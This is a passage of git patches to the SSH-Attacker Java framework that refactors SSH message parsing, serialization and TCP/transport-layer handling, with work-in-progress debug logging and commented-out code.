readUserAuthSucc(); + break; + case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: + readChannelOpenConfirmation(); + break; + case SSH_MSG_CHANNEL_CLOSE: + readChannelCloseMessage(); + break; + + case SSH_MSG_CHANNEL_EOF: + readChannelEofMessage(); + break; + + case SSH_MSG_CHANNEL_EXTENDED_DATA: + readChannelExtendedDataMessage(); + break; + + case SSH_MSG_CHANNEL_FAILURE: + readChannelFailureMessage(); + break; + + case SSH_MSG_CHANNEL_OPEN_FAILURE: + readChannelOpenFailureMessage(); + break; + case SSH_MSG_CHANNEL_SUCCESS: + readChannelSuccessMessage(); + break; default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); throw new RuntimeException(); @@ -839,6 +867,46 @@ private void readGlobalRequest() { } } + private void readChannelSuccessMessage() { + ChannelSuccessMessage message = new ChannelSuccessMessage(); + readDataContainer(message, context); + } + + private void readChannelCloseMessage() { + ChannelCloseMessage message = new ChannelCloseMessage(); + readDataContainer(message, context); + } + + private void readChannelEofMessage() { + ChannelEofMessage message = new ChannelEofMessage(); + readDataContainer(message, context); + } + + private void readChannelExtendedDataMessage() { + ChannelExtendedDataMessage message = new ChannelExtendedDataMessage(); + readDataContainer(message, context); + } + + private void readChannelFailureMessage() { + ChannelFailureMessage message = new ChannelFailureMessage(); + readDataContainer(message, context); + } + + private void readChannelOpenFailureMessage() { + ChannelOpenFailureMessage message = new ChannelOpenFailureMessage(); + readDataContainer(message, context); + } + + private void readChannelOpenConfirmation() { + ChannelOpenConfirmationMessage message = new ChannelOpenConfirmationMessage(); + readDataContainer(message, context); + } + + private void readUserAuthSucc() { + UserAuthSuccessMessage message = new UserAuthSuccessMessage(); + readDataContainer(message, context); + } + private void readServiceRequestData() { ServiceRequestMessage message = new ServiceRequestMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java index 6c9da5caf..c0c34c1b9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthFailureMessageParser.java @@ -40,7 +40,7 @@ public UserAuthFailureMessage createMessage() { @Override public void parse(UserAuthFailureMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java index beef6bf9a..88ddb970b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthHostbasedMessageParser.java @@ -46,7 +46,7 @@ protected UserAuthHostbasedMessage createMessage() { @Override public void parse(UserAuthHostbasedMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java index eeb8fd84c..143863afe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoRequestMessageParser.java @@ -46,7 +46,7 @@ protected UserAuthInfoRequestMessage createMessage() { @Override public void parse(UserAuthInfoRequestMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoResponseMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoResponseMessageParser.java index bf1c1a26f..ebc8c90c1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoResponseMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthInfoResponseMessageParser.java @@ -43,7 +43,7 @@ protected UserAuthInfoResponseMessage createMessage() { @Override public void parse(UserAuthInfoResponseMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthKeyboardInteractiveMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthKeyboardInteractiveMessageParser.java index b201f35b7..438cdedbe 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthKeyboardInteractiveMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthKeyboardInteractiveMessageParser.java @@ -44,7 +44,7 @@ protected UserAuthKeyboardInteractiveMessage createMessage() { @Override public void parse(UserAuthKeyboardInteractiveMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParser.java index 5799e26a9..f546a5087 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthSuccessMessageParser.java @@ -40,7 +40,7 @@ public UserAuthSuccessMessage createMessage() { @Override public void parse(UserAuthSuccessMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java index 26361989b..893dcbb1d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java @@ -56,7 +56,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java index 68a6b52d1..34aada168 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java @@ -22,7 +22,7 @@ public void serializeMessageSpecificContents() {} @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java index 9c9dda6f5..fd8cd519c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java @@ -48,7 +48,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java index 1a6e57fbf..d5336d38b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java @@ -22,7 +22,7 @@ public void serializeMessageSpecificContents() {} @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } From fe5bde319068dc98ed5a51b1ecf4607b782671e7 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 15 Jul 2023 00:08:38 +0200 Subject: [PATCH 035/176] wip: Cleanups --- .../core/layer/impl/SSH2Layer.java | 72 +------ .../sshattacker/core/layer/impl/TcpLayer.java | 26 ++- .../core/layer/impl/TransportLayer.java | 177 ++---------------- .../KeyExchangeInitMessageHandler.java | 4 +- .../KeyExchangeInitMessagePreparator.java | 114 ++++++++++- 5 files changed, 156 insertions(+), 237 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index acfeba4ef..6208b6918 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -7,18 +7,6 @@ */ package de.rub.nds.sshattacker.core.layer.impl; -/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; -import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; -import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; -import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; -import de.rub.nds.sshattacker.core.exceptions.TimeoutException; -import de.rub.nds.sshattacker.core.layer.LayerConfiguration; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.message.*;*/ - import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.TimeoutException; @@ -143,7 +131,12 @@ public LayerProcessingResult sendConfiguration() throws IOException { addProducedContainer(message); flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); - if (message.getCompleteResultingMessage().getValue()[0] + ProtocolMessageHandler handler = message.getHandler(context); + if (handler instanceof MessageSentHandler) { + ((MessageSentHandler) handler).adjustContextAfterMessageSent(); + } + + /*if (message.getCompleteResultingMessage().getValue()[0] == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue()) { ProtocolMessageHandler handler = message.getHandler(context); if (handler instanceof MessageSentHandler) { @@ -153,7 +146,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { LOGGER.info( "[bro] Adjusting Context while messagetype is {}", message.getCompleteResultingMessage().getValue()[0]); - } + }*/ } } @@ -205,57 +198,6 @@ private void processMessage( collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); - // Wird nicht benötigt, da wir keinen "Gesamt"-Digest benötigen ? - // message.getHandler(context).updateDigest(message, true); - - if (message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() - || message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_HBR_REPLY.getValue() - || message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { - message.setAdjustContext(Boolean.FALSE); - } else { - LOGGER.info( - "[bro] Adjusting Context while messagetype is {}", - message.getCompleteResultingMessage().getValue()[0]); - } - - if (message.getAdjustContext()) { - // message.getHandler(context).adjustContext(message); - } - - // Unklar für SSHv2, erstmal ignoriert - /*if (mustFlushCollectedMessagesImmediately(message)) { - flushCollectedMessages(message.getProtocolMessageType(), collectedMessageStream); - }*/ - - /* if (message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue()) { - ProtocolMessageHandler handler = message.getHandler(context); - if (handler instanceof MessageSentHandler) { - ((MessageSentHandler) handler).adjustContextAfterMessageSent(); - } - } else { - LOGGER.info( - "[bro] Adjusting Context while messagetype is {}", - message.getCompleteResultingMessage().getValue()[0]); - }*/ - - if (message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() - || message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { - message.getHandler(context).adjustContextAfterMessageSent(message); - } else { - LOGGER.info( - "[bro] Adjusting Context while messagetype is {}", - message.getCompleteResultingMessage().getValue()[0]); - } - - if (message.getAdjustContext()) { - message.getHandler(context).adjustContextAfterSerialize(message); - } } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 941c76925..f73135620 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -18,6 +18,7 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.tlsattacker.transport.tcp.TcpTransportHandler; import java.io.IOException; +import java.io.InputStream; import java.util.concurrent.TimeUnit; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -67,13 +68,34 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException @Override public HintedInputStream getDataStream() { getTransportHandler().setTimeout(getTransportHandler().getTimeout()); - LOGGER.debug("[bro] TCP-Layer is transmitting Datastream now"); + int retries = 0; + int maxRetries = 10; + LOGGER.debug( + "[bro] TCP-Layer is transmitting Datastream now with Timeout ", + getTransportHandler().getTimeout()); // TODO: remove later, just for debugging - try { + /* try { TimeUnit.SECONDS.sleep(1); } catch (InterruptedException e) { throw new RuntimeException(e); + }*/ + + InputStream handlerStream = getTransportHandler().getInputStream(); + try { + while (handlerStream.available() == 0 && retries < maxRetries) { + handlerStream = getTransportHandler().getInputStream(); + try { + TimeUnit.MILLISECONDS.sleep(10); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + retries++; + LOGGER.debug("got no stream in {}-trie", retries); + } + } catch (IOException e) { + throw new RuntimeException(e); } + currentInputStream = new HintedInputStreamAdapterStream(null, getTransportHandler().getInputStream()); return currentInputStream; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 0738f7f64..60da4ebcf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -364,7 +364,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException PacketLayerHint currentHint; // currentHint = new PacketLayerHint(packet.getContentMessageType()); - currentHint = temp_parser(packet, context); + currentHint = parseMessageId(packet, context); LOGGER.debug("[bro] got hint: " + currentHint.getType()); @@ -415,7 +415,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } } - public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { + public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) { byte[] raw = packet.getPayload().getValue(); if (packet instanceof BlobPacket) { String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); @@ -441,9 +441,6 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { } } - // LOGGER.debug("[bro] Identifier: {} and constant {}", - // packet.getCiphertext().getValue()[1]); - MessageIdConstant id = MessageIdConstant.fromId( packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext()); @@ -454,25 +451,6 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { switch (MessageIdConstant.fromId( packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext())) { - case SSH_MSG_KEXINIT: - LOGGER.debug("[bro] returning SSH KEX INIT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXINIT); - case SSH_MSG_HBR_INIT: - LOGGER.debug("[bro] returning SSH_MSG_HBR_INIT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_INIT); - case SSH_MSG_NEWKEYS: - LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS); - case SSH_MSG_SERVICE_REQUEST: - LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_REQUEST); - case SSH_MSG_HBR_REPLY: - LOGGER.debug("[bro] returning SSH_MSG_HBR_REPLY Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_REPLY); - /* case SSH_MSG_NEWKEYS: - LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS);*/ - // SPACER// case SSH_MSG_DISCONNECT: LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DISCONNECT); @@ -494,6 +472,13 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { case SSH_MSG_NEWCOMPRESS: LOGGER.debug("[bro] returning SSH_MSG_NEWCOMPRESS Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWCOMPRESS); + + case SSH_MSG_KEXINIT: + LOGGER.debug("[bro] returning SSH KEX INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXINIT); + case SSH_MSG_NEWKEYS: + LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS); case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REQUEST_OLD Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REQUEST_OLD); @@ -515,6 +500,15 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { case SSH_MSG_KEXDH_REPLY: LOGGER.debug("[bro] returning SSH_MSG_KEXDH_REPLY Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXDH_REPLY); + case SSH_MSG_HBR_INIT: + LOGGER.debug("[bro] returning SSH_MSG_HBR_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_INIT); + case SSH_MSG_HBR_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_HBR_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_REPLY); + case SSH_MSG_SERVICE_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_REQUEST); case SSH_MSG_KEX_ECDH_INIT: LOGGER.debug("[bro] returning SSH_MSG_KEX_ECDH_INIT Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_ECDH_INIT); @@ -645,7 +639,6 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { case UNKNOWN: LOGGER.debug("[bro] returning UNKNOWN Hint"); return new PacketLayerHint(ProtocolMessageType.UNKNOWN); - default: LOGGER.debug( "[bro] cannot identifie {} as {} - returningn null", @@ -654,140 +647,6 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext())); return null; - // return new KeyExchangeInitMessageParser(raw).parse(); } - - /* try { - if (packet instanceof BlobPacket) { - String rawText = - new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); - if (rawText.startsWith("SSH-2.0")) { - VersionExchangeMessage message = new VersionExchangeMessage(); - VersionExchangeMessageParser parser = - new VersionExchangeMessageParser(new ByteArrayInputStream(raw)); - parser.parse(message); - return new PacketLayerHint(ProtocolMessageType.TRANSPORT); - } else { - final AsciiMessage message = new AsciiMessage(); - AsciiMessageParser parser = - new AsciiMessageParser(new ByteArrayInputStream(raw)); - parser.parse(message); - - // If we know what the text message means we can print a - // human-readable warning to the log. The following - // messages are sent by OpenSSH. - final String messageText = message.getText().getValue(); - if ("Invalid SSH identification string.".equals(messageText)) { - LOGGER.warn( - "The server reported the identification string sent by the SSH-Attacker is invalid"); - } else if ("Exceeded MaxStartups".equals(messageText)) { - LOGGER.warn( - "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); - } - return new PacketLayerHint(ProtocolMessageType.TRANSPORT); - } - } - } catch (ParserException e) { - LOGGER.debug("Error while Parsing, now parsing as UnknownMessage: " + e); - return new PacketLayerHint(ProtocolMessageType.UNKNOWN); - //return new UnknownMessageParser(raw).parse(); - }*/ - - /*switch (MessageIdConstant.fromId(raw[0], context.getContext())) { - case SSH_MSG_KEXINIT: - return new KeyExchangeInitMessageParser(raw).parse(); - case SSH_MSG_KEX_ECDH_INIT: - return new EcdhKeyExchangeInitMessageParser(raw).parse(); - case SSH_MSG_KEX_ECDH_REPLY: - return new EcdhKeyExchangeReplyMessageParser(raw).parse(); - case SSH_MSG_KEXDH_INIT: - return new DhKeyExchangeInitMessageParser(raw).parse(); - case SSH_MSG_KEXDH_REPLY: - return new DhKeyExchangeReplyMessageParser(raw).parse(); - case SSH_MSG_HBR_INIT: - return handleHybridKeyExchangeInitMessageParsing(raw, context).parse(); - case SSH_MSG_HBR_REPLY: - return handleHybridKeyExchangeReplyMessageParsing(raw, context).parse(); - case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: - return new DhGexKeyExchangeOldRequestMessageParser(raw).parse(); - case SSH_MSG_KEX_DH_GEX_REQUEST: - return new DhGexKeyExchangeRequestMessageParser(raw).parse(); - case SSH_MSG_KEX_DH_GEX_GROUP: - return new DhGexKeyExchangeGroupMessageParser(raw).parse(); - case SSH_MSG_KEX_DH_GEX_INIT: - return new DhGexKeyExchangeInitMessageParser(raw).parse(); - case SSH_MSG_KEX_DH_GEX_REPLY: - return new DhGexKeyExchangeReplyMessageParser(raw).parse(); - case SSH_MSG_KEXRSA_PUBKEY: - return new RsaKeyExchangePubkeyMessageParser(raw).parse(); - case SSH_MSG_KEXRSA_SECRET: - return new RsaKeyExchangeSecretMessageParser(raw).parse(); - case SSH_MSG_KEXRSA_DONE: - return new RsaKeyExchangeDoneMessageParser(raw).parse(); - case SSH_MSG_NEWKEYS: - return new NewKeysMessageParser(raw).parse(); - case SSH_MSG_SERVICE_REQUEST: - return new ServiceRequestMessageParser(raw).parse(); - case SSH_MSG_SERVICE_ACCEPT: - return new ServiceAcceptMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: - return new ChannelOpenConfirmationMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_DATA: - return new ChannelDataMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_CLOSE: - return new ChannelCloseMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_EOF: - return new ChannelEofMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_EXTENDED_DATA: - return new ChannelExtendedDataMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_FAILURE: - return new ChannelFailureMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_OPEN_FAILURE: - return new ChannelOpenFailureMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_OPEN: - return handleChannelOpenMessageParsing(raw); - case SSH_MSG_CHANNEL_SUCCESS: - return new ChannelSuccessMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_WINDOW_ADJUST: - return new ChannelWindowAdjustMessageParser(raw).parse(); - case SSH_MSG_DEBUG: - return new DebugMessageParser(raw).parse(); - case SSH_MSG_DISCONNECT: - return new DisconnectMessageParser(raw).parse(); - case SSH_MSG_IGNORE: - return new IgnoreMessageParser(raw).parse(); - case SSH_MSG_REQUEST_FAILURE: - return new GlobalRequestFailureMessageParser(raw).parse(); - case SSH_MSG_REQUEST_SUCCESS: - return new GlobalRequestSuccessMessageParser(raw).parse(); - case SSH_MSG_UNIMPLEMENTED: - return new UnimplementedMessageParser(raw).parse(); - case SSH_MSG_USERAUTH_REQUEST: - return handleUserAuthRequestMessageParsing(raw); - case SSH_MSG_USERAUTH_BANNER: - return new UserAuthBannerMessageParser(raw).parse(); - case SSH_MSG_USERAUTH_FAILURE: - return new UserAuthFailureMessageParser(raw).parse(); - case SSH_MSG_USERAUTH_SUCCESS: - return new UserAuthSuccessMessageParser(raw).parse(); - case SSH_MSG_CHANNEL_REQUEST: - return handleChannelRequestMessageParsing(raw); - case SSH_MSG_GLOBAL_REQUEST: - return handleGlobalRequestMessageParsing(raw); - case SSH_MSG_USERAUTH_INFO_REQUEST: - return new UserAuthInfoRequestMessageParser(raw).parse(); - case SSH_MSG_USERAUTH_INFO_RESPONSE: - return new UserAuthInfoResponseMessageParser(raw).parse(); - default: - LOGGER.debug( - "Received unimplemented Message " - + MessageIdConstant.getNameById(raw[0]) - + " (" - + raw[0] - + ")"); - return new UnknownMessageParser(raw).parse(); - }*/ - - // return null; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java index 7aa4db437..9e7656bc0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java @@ -72,7 +72,7 @@ public void adjustContextAfterMessageSent(KeyExchangeInitMessage message) { .split("" + CharConstants.ALGORITHM_SEPARATOR))); sshContext.setServerReserved(message.getReserved().getValue()); - sshContext.getExchangeHashInputHolder().setClientKeyExchangeInit(message); + // sshContext.getExchangeHashInputHolder().setClientKeyExchangeInit(message); } else { sshContext.setClientCookie(message.getCookie().getValue()); sshContext.setClientSupportedKeyExchangeAlgorithms( @@ -119,7 +119,7 @@ public void adjustContextAfterMessageSent(KeyExchangeInitMessage message) { .split("" + CharConstants.ALGORITHM_SEPARATOR))); sshContext.setClientReserved(message.getReserved().getValue()); - sshContext.getExchangeHashInputHolder().setServerKeyExchangeInit(message); + // sshContext.getExchangeHashInputHolder().setServerKeyExchangeInit(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java index 83cf93952..3549e1785 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java @@ -8,6 +8,7 @@ package de.rub.nds.sshattacker.core.protocol.transport.preparator; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.transport.message.KeyExchangeInitMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; @@ -19,7 +20,7 @@ public KeyExchangeInitMessagePreparator(Chooser chooser, KeyExchangeInitMessage } @Override - public void prepareMessageSpecificContents() { + /* public void prepareMessageSpecificContents() { if (chooser.getContext().getSshContext().isClient()) { getObject().setCookie(chooser.getClientCookie()); getObject() @@ -61,10 +62,105 @@ public void prepareMessageSpecificContents() { chooser.getClientFirstKeyExchangePacketFollows()); getObject().setReserved(chooser.getClientReserved()); - /*chooser.getContext() - .getSshContext() - .getExchangeHashInputHolder() - .setClientKeyExchangeInit(getObject());*/ + chooser.getContext() + .getSshContext() + .getExchangeHashInputHolder() + .setClientKeyExchangeInit(getObject()); + } else { + getObject().setCookie(chooser.getServerCookie()); + getObject() + .setKeyExchangeAlgorithms( + chooser.getServerSupportedKeyExchangeAlgorithms(), true); 